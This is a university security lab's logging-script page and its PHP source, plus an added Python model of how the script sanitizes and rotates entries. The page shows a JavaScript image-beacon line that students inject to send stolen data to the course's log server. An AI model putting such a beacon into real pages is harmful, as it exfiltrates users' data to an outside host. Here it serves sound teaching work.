You can use this server-side script to extract data from client-side JavaScript. For example, clicking this client-side hyperlink will cause the server to log the payload:
(new Image()).src='https://css.csail.mit.edu/6.5660/2023/labs/log.php?' + 'id=my-username' + '&payload=some-string' + '&random=' + Math.random();
The random argument is ignored by the server, but it ensures that the browser bypasses its cache when downloading the image. We suggest that you use the random argument in your scripts as well. The ID argument will help you distinguish your log entries from those sent by other students; we suggest picking your MIT Athena username. Newlines are not allowed in javascript: links; if this bothers you, try URL encoding.
If you just want to try out the script, you can use this form. (For your actual attacks in lab 4, you'll probably want to use the JavaScript image technique shown above.)
Below are the most recent logged entries, so that you can check if your attack worked:
In case you are curious, here is the source code of this page.
<?php
header("Access-Control-Allow-Origin: *");

do {
    if (!array_key_exists("id", $_REQUEST)) {
        break;
    }

    $id = $_REQUEST['id'];
    if (strlen($id) > 1000) {
        header("HTTP/1.0 413 Payload Too Large");
        echo "ID value is larger than 1000 bytes";
        return;
    }

    if (!array_key_exists("payload", $_REQUEST)) {
        header("HTTP/1.0 400 Bad Request");
        echo "No payload given";
        return;
    }

    $payload = $_REQUEST['payload'];
    if (empty($payload)) {
        header("HTTP/1.0 400 Bad Request");
        echo "Empty payload given";
        return;
    }

    if (strlen($payload) > 1000) {
        header("HTTP/1.0 413 Payload Too Large");
        echo "Payload is larger than 1000 bytes";
        return;
    }

    if (!function_exists('apcu_add')) {
        header("HTTP/1.0 501 Not Implemented");
        echo "APCu not enabled, so no rate limiting; refusing all requests";
        return;
    }

    if (apcu_add($payload, true, 5) === false) {
        // exact same $payload was sent in the past 5 seconds
        header("HTTP/1.0 429 Too Many Requests");
        echo "That exact payload was sent very recently; rejecting";
        return;
    }

    $payload = str_replace(array("\n", "\r"), '.', $payload);
    $id = str_replace(array("\n", "\r"), '.', $id);

    $file = fopen("/tmp/6.5660-2023-logger.txt", "c+");
    if ($file === false) {
        header("HTTP/1.0 503 Service Unavailable");
        echo "Failed to open log file";
        return;
    }

    if (!flock($file, LOCK_EX)) {
        header("HTTP/1.0 503 Service Unavailable");
        echo "Failed to lock log file";
        return;
    }

    $lines = array();
    while (!feof($file) && count($lines) < 100) {
        $lines[] = fgets($file);
    }

    ftruncate($file, 0);
    rewind($file);
    fwrite($file, date(DATE_RFC2822) . ": " . $id . ": " . $payload . "\n");
    foreach ($lines as &$line) {
        fwrite($file, $line);
    }

    flock($file, LOCK_UN);
    fclose($file);
    echo "Logged!";
    return;
} while(0);

$link = "(new Image()).src=" .
        "'https://css.csail.mit.edu/6.5660/2023/labs/log.php?'" .
        " + 'id=my-username'" .
        " + '&payload=some-string' + '&random='" .
        " + Math.random()";
?><!DOCTYPE html>
<html>
<head>
<link rel="stylesheet" type="text/css" href="labs.css" />
<title>Lab 4 Logging Script</title>
</head>
<body>
<h1>Lab 4 Logging Script</h1>
<p>
You can use this server side script to extract data from client-side JavaScript.
For example, clicking this client-side hyperlink will cause the server to log the payload:
</p>
<pre class="tty"><a href="javascript:void(<?=$link;?>)"><?=$link;?>;</a></pre>
<p>
The random argument is ignored, but ensures that the browser bypasses its cache when downloading the image.
We suggest that you use the random argument in your scripts as well.
The ID argument will help you distinguish your log entries from those sent by other students; we suggest picking your MIT Athena username.
Newlines are not allowed in <tt>javascript:</tt> links; if this bothers you, try <a href="https://meyerweb.com/eric/tools/dencoder/">URL encoding</a>.
</p>
<h2>Test form</h2>
<p>
If you just want to try out the script, you can use this form.
(For your actual attacks in lab 4, you'll probably want to use the JavaScript image technique shown above.)
</p>
<form method="GET" action="">
<label for="id">ID:</label><br />
<input name="id" placeholder="your-mit-username" size="40" />
<i>(some identifier to locate your payload in the log)</i>
<br />
<br />
<label for="payload">Payload:</label><br />
<input name="payload" placeholder="some-string" size="40" />
<i>(the information you stole)</i>
<br />
<input type="submit" value="Log" name="log_submit" />
</form>
<h2>Logged entries</h2>
<p>
Below are the most recent logged entries, so that you can check if your attack worked:
</p>
<pre class="tty"><?php
$lines = file_get_contents("/tmp/6.5660-2023-logger.txt");
echo htmlspecialchars($lines);
?></pre>
<h2>Source code</h2>
<p>In case you are curious, here is the source code of this page.</p>
<pre><?php highlight_file(__FILE__); ?></pre>
</body>
</html>
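As an added example (not the lab's own code), here is a Python model of what the script above does with each entry: the CR/LF replacement that stops a payload from forging a second log line with a fake date and id, the exact-payload rejection that apcu_add($payload, true, 5) provides, and the newest-first rotation capped at 100 lines. The names sanitize, format_entry, PayloadDedup, prepend and parse_log, and the SAMPLE_TIME constant, are this example's own; it also models PHP's empty() treating "0" as empty.

```python
from datetime import datetime, timezone
from email.utils import format_datetime

# Added example: a Python model of what log.php does with one entry; not the lab's own code.
MAX_LEN = 1000      # server rejects an id or payload longer than 1000 bytes (strlen)
MAX_ENTRIES = 100   # server keeps the newest 100 lines, most recent first
# Constructed timestamp, chosen to match the RFC 2822 format the server writes.
SAMPLE_TIME = datetime(2025, 10, 18, 10, 34, 37, tzinfo=timezone.utc)

def sanitize(field: str) -> str:
    """Mirror the server's str_replace of CR/LF with '.': without it a payload
    could inject a second log line carrying a forged date and id."""
    return field.replace("\n", ".").replace("\r", ".")

def format_entry(id_: str, payload: str, when: datetime, sanitize_fields=True) -> str:
    """One log line as the server writes it: RFC 2822 date, id, payload."""
    if payload in ("", "0"):             # PHP empty() also treats "0" as empty
        raise ValueError("Empty payload given")
    if len(id_) > MAX_LEN or len(payload) > MAX_LEN:   # len() counts chars, strlen bytes
        raise ValueError("Payload Too Large")
    if sanitize_fields:                  # False only to demonstrate the hazard
        id_, payload = sanitize(id_), sanitize(payload)
    return f"{format_datetime(when)}: {id_}: {payload}\n"

class PayloadDedup:
    """In-memory stand-in for apcu_add($payload, true, 5): an identical payload
    is refused while an earlier acceptance is still within `ttl` seconds."""
    def __init__(self, ttl: float = 5.0):
        self.ttl, self.expires = ttl, {}

    def allow(self, payload: str, now: float) -> bool:
        if now < self.expires.get(payload, float("-inf")):
            return False                 # refused attempts do not extend the TTL
        self.expires[payload] = now + self.ttl
        return True

def prepend(log: list, entry: str) -> list:
    """Rotation as the server does it: new entry first, at most MAX_ENTRIES kept."""
    return [entry] + log[:MAX_ENTRIES - 1]

def parse_log(text: str) -> list:
    """Split logged lines into date/id/payload. The RFC 2822 date contains no ': ',
    and ids are assumed not to either; payloads may, so split at most twice."""
    entries = []
    for line in text.splitlines():
        date, id_, payload = line.split(": ", 2)
        entries.append({"date": date, "id": id_, "payload": payload})
    return entries
```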